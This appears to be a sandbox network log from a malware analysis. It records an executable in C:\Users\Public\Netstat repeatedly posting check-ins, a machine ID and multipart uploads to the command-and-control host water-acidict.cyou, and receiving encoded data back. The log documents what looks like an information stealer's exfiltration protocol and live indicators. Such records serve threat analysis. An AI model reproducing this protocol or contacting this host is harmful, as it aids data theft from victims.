                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h07w4hmxQ1EC6UYfThmq1%2Bb8WH%2BPe7%2BMxMM8E1P%2FjPJ8vxpHe0pIq4FmA%2F7Kr9VgiDKdRmKVrQlFpIOHxjwmTnhGH44hmZARDnIAUyZLgrBextrP9H0opHwwwppL7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed05ac51f791-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1632&rtt_var=618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=979&delivery_rate=1789215&cwnd=65&unsent_bytes=0&cid=42f10a17eb9dc843&ts=462&x=0"


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      4 | 192.168.2.4 | 49746 | 172.67.156.217 | 443 | 7984 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:09 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:09 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-11-29 22:10:10 UTC | 1021 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:09 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=p7k9v6aiofrpj0lts098knj4cc; expires=Tue, 25-Mar-2025 15:56:48 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QDBRvhAsgsbOAo1B%2FwvwbrbypRSyffUi88j7%2BcIErL2m18uTFuYulkUPMEcBLEZjW6d0G4MaFFcldGAmUpBWh7r%2FJDLto%2F4whqxoNvTmCRn%2BKghzpKESQVPN6ohOY73U%2BZO5x0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed1a18de727a-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2045&rtt_var=1022&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4228&recv_bytes=909&delivery_rate=101069&cwnd=217&unsent_bytes=0&cid=9c4edfc845aff7fb&ts=870&x=0"
                                                                                                                                      2024-11-29 22:10:10 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-29 22:10:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      5 | 192.168.2.4 | 49747 | 172.67.156.217 | 443 | 7984 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:11 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 47
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:11 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 26 6a 3d
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--bandl&j=
                                                                                                                                      2024-11-29 22:10:12 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:12 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=gm1b74lmrmcue21kc8nc0usao3; expires=Tue, 25-Mar-2025 15:56:51 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRhfOeYsiXFmf6iDnPi5zm8FqOj3ZB5YuPrLNxvgUpAR5FsgSwFAopewiYw0wtMHQyi6Hbo5KeXiiBYuFn%2BfFCOD8VfggiNJX9J5XkmzLt75gqPmOdFdSnrUTYmLcP%2FuKsiC0EQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed27bda68c83-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1832&min_rtt=1830&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=949&delivery_rate=1580942&cwnd=189&unsent_bytes=0&cid=3c2d3e9169e9632e&ts=812&x=0"


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      6 | 192.168.2.4 | 49748 | 172.67.156.217 | 443 | 7984 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:13 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=3H5U00QCDNS
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 18326
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:14 UTC | 15331 | OUT | Data Raw: 2d 2d 33 48 35 55 30 30 51 43 44 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 33 48 35 55 30 30 51 43 44 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 48 35 55 30 30 51 43 44 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 33 48 35 55 30 30 51 43 44 4e 53 0d 0a 43 6f 6e 74
                                                                                                                                      Data Ascii: --3H5U00QCDNSContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--3H5U00QCDNSContent-Disposition: form-data; name="pid"2--3H5U00QCDNSContent-Disposition: form-data; name="lid"c2CoW0--bandl--3H5U00QCDNSCont
                                                                                                                                      2024-11-29 22:10:15 UTC | 1024 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:14 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=3um6a255thg9j0p9a3fgqlujoe; expires=Tue, 25-Mar-2025 15:56:53 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NU1mGixbu%2FHYk7guCy%2FApbqKbkPXX%2FAXKuaBWpQ2LUJyYcNBi8xtZXpPNDOcl8ANpAvg%2FYl0kLaFDxQHN1nc2eJ3tofAI1UD1GMc3dQ4j5TqhfiKIILCiBr2K7kgRk9cHA%2BhKI0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed369981427f-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1759&rtt_var=664&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19283&delivery_rate=1641371&cwnd=237&unsent_bytes=0&cid=ed81495eefd233c8&ts=1124&x=0"
                                                                                                                                      2024-11-29 22:10:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      7 | 192.168.2.4 | 49750 | 172.67.156.217 | 443 | 7984 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:16 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=F2IXTAQELCJS7CO9O2
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8784
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:16 UTC | 8784 | OUT | Data Raw: 2d 2d 46 32 49 58 54 41 51 45 4c 43 4a 53 37 43 4f 39 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 46 32 49 58 54 41 51 45 4c 43 4a 53 37 43 4f 39 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 32 49 58 54 41 51 45 4c 43 4a 53 37 43 4f 39 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c
                                                                                                                                      Data Ascii: --F2IXTAQELCJS7CO9O2Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--F2IXTAQELCJS7CO9O2Content-Disposition: form-data; name="pid"2--F2IXTAQELCJS7CO9O2Content-Disposition: form-data; name="lid"c2CoW0--bandl
                                                                                                                                      2024-11-29 22:10:17 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:17 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=uejqqsnbjq3oirj4a14bt7sgr3; expires=Tue, 25-Mar-2025 15:56:55 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIQnnOHur%2Fw9nGtRwfJheacCrJsXc15nGWyEyLEX61Sb73c1jtETEdGh37OEHFnODUIcDppDorn7smcVnDumLRkRC4jiaDkCIW9ZC9wH2HSZH0v6hc%2FbICKPDd4eboqkiAqBZVM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed45e8964237-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1741&rtt_var=658&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9725&delivery_rate=1655328&cwnd=194&unsent_bytes=0&cid=21995e130991ab92&ts=977&x=0"
                                                                                                                                      2024-11-29 22:10:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      8 | 192.168.2.4 | 49751 | 172.67.156.217 | 443 | 7568 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:17 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:17 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-11-29 22:10:18 UTC  1024               IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:18 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=jfa494mq4kjmri0969nvgr3mno; expires=Tue, 25-Mar-2025 15:56:57 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RmP1vXIuOk3wCxRPmJBkPBdet3gJsbQ62%2FKUkhMYYX5uQbcWjzfZ9NSat%2Bbper%2F1fy1cXV0SBOFYjrS9QXSkUhjq%2FxV%2Boip5mQRpObNC5Ktqk56DT%2B0XBiaA0melHrmXaxMyb%2Fc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed4e881a4401-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1825&rtt_var=687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1591280&cwnd=231&unsent_bytes=0&cid=65a24f3b0eb02049&ts=1125&x=0"
                                                                                                                                      2024-11-29 22:10:18 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-29 22:10:18 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                      9           192.168.2.4  49749        20.109.210.53   443
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:10:18 UTC  306                OUT        GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=stBxbGhrHxDYMZ9&MD=gESBNraw HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-11-29 22:10:18 UTC  560                IN         HTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                      MS-CorrelationId: 0d183424-28d3-4bae-9cc8-3333b6e1445f
                                                                                                                                      MS-RequestId: 3ea3a16a-02bd-45d9-8f64-4d8f7bbc946b
                                                                                                                                      MS-CV: mTlSidI7VkStOY2Q.0
                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:17 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 24490


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                      10          192.168.2.4  49753        172.67.156.217  443               7984  C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:10:18 UTC  278                OUT        POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=HVENPYA281G5
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20401
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      Data Ascii: --HVENPYA281G5Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--HVENPYA281G5Content-Disposition: form-data; name="pid"3--HVENPYA281G5Content-Disposition: form-data; name="lid"c2CoW0--bandl--HVENPYA281G5
                                                                                                                                      2024-11-29 22:10:19 UTC  1026               IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:19 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=hmet8lo2rkua5031qp3ul9f6bh; expires=Tue, 25-Mar-2025 15:56:58 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k97UZApMDwAdhYiwijzt%2B%2FmmeMkhU2aX%2Bu0fHy8yzalx9faUTMvWyUaxrq9f3fc7SzAyY9HxNEXLYzff4IsgK0BqHnMWW7%2BUdWCdBK3CqPsUXbp9qmW%2FD8doLw2yN3%2Bukm53ogI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed55bea18cdc-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1949&rtt_var=745&sent=18&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21359&delivery_rate=1455633&cwnd=250&unsent_bytes=0&cid=985b161db98c2a1e&ts=1018&x=0"
                                                                                                                                      2024-11-29 22:10:19 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:19 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                      11          192.168.2.4  49756        172.67.156.217  443               7568  C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:10:20 UTC  266                OUT        POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 47
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:20 UTC  47                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 26 6a 3d
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--bandl&j=
                                                                                                                                      2024-11-29 22:10:21 UTC  1013               IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:21 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=vlc2gqjq75kq1a1k9sehrejdp1; expires=Tue, 25-Mar-2025 15:56:59 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXgXSZpIPkc5wikVv4slk5dTMpF6yl22NKlsaXFjCe55fqLXwhVHEZ2d6EC1chDjzNPSG88JHmeInXqYvxd3NnwTnpq9%2F4oEgnTUDfs56rMloyss8HYvi%2F9cidPVqHPAUqvqbsk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed5eea7c7d24-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1794&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=949&delivery_rate=1547429&cwnd=193&unsent_bytes=0&cid=b0660ed8591edc55&ts=829&x=0"
                                                                                                                                      Data Ascii: otVm+sdT9wcGAAX2mF5t1NAzLS8i/11dzTtkqHj5N+DChT+kklqoU2EYQq/cADrJ0CUtbmG1HRWOKXavHpdCtZDXfuTXSqlkFy88yZtNdNWXa3xpLOcAU9UGNaBgliv7j5YwtPVG6EQmGBO6qUB92oZteiYtiTkyzXE17mDxN/XX0nm0mBW0EXRdVafcUTTC0GstcTDpTwHNZzWvI7t3vZTAa7P+e8FEJg8U54NCW9iBd1MXd6QBHYopZKhu6Wr
                                                                                                                                      2024-11-29 22:10:21 UTC1369INData Raw: 76 66 57 52 71 46 30 48 79 4d 51 38 4a 35 4e 4f 4f 71 64 65 58 73 38 59 62 63 49 4c 62 4d 53 5a 2b 38 77 71 69 65 58 6b 4e 74 6b 79 76 35 79 39 30 30 78 54 43 54 30 6d 45 30 36 6c 64 42 6c 4c 58 45 69 69 68 30 55 6e 54 77 33 78 43 65 6b 61 66 75 49 6d 48 47 30 31 67 57 2b 47 57 39 4f 45 4c 66 57 44 6a 33 59 67 6d 39 72 4b 6e 53 6b 53 43 32 7a 45 6d 66 76 4d 4b 6f 6e 69 70 72 53 66 75 48 44 56 65 46 30 48 79 4d 51 38 4a 35 4e 4f 50 36 71 50 31 77 2f 59 61 63 42 46 4d 31 78 4e 66 42 67 38 53 57 57 68 64 46 34 39 34 4a 67 33 41 67 51 47 41 48 33 67 45 6b 36 6c 64 42 78 4c 58 45 69 71 68 30 55 6e 54 77 35 37 7a 71 75 4a 61 54 5a 7a 79 6a 69 67 42 32 31 42 47 45 63 51 71 2f 4f 43 58 54 57 6b 58 35 6a 4b 6e 43 31 43 52 43 62 50 44 4c 57 48 6f 5a 75 75 6f 66 62
                                                                                                                                      Data Ascii: vfWRqF0HyMQ8J5NOOqdeXs8YbcILbMSZ+8wqieXkNtkyv5y900xTCT0mE06ldBlLXEiih0UnTw3xCekafuImHG01gW+GW9OELfWDj3Ygm9rKnSkSC2zEmfvMKoniprSfuHDVeF0HyMQ8J5NOP6qP1w/YacBFM1xNfBg8SWWhdF494Jg3AgQGAH3gEk6ldBxLXEiqh0UnTw57zquJaTZzyjigB21BGEcQq/OCXTWkX5jKnC1CRCbPDLWHoZuuofb


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      12 | 192.168.2.4 | 49757 | 172.67.156.217 | 443 | 7984 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:21 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=F9TF042QFM74Q
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1237
                                                                                                                                      Host: water-acidict.cyou
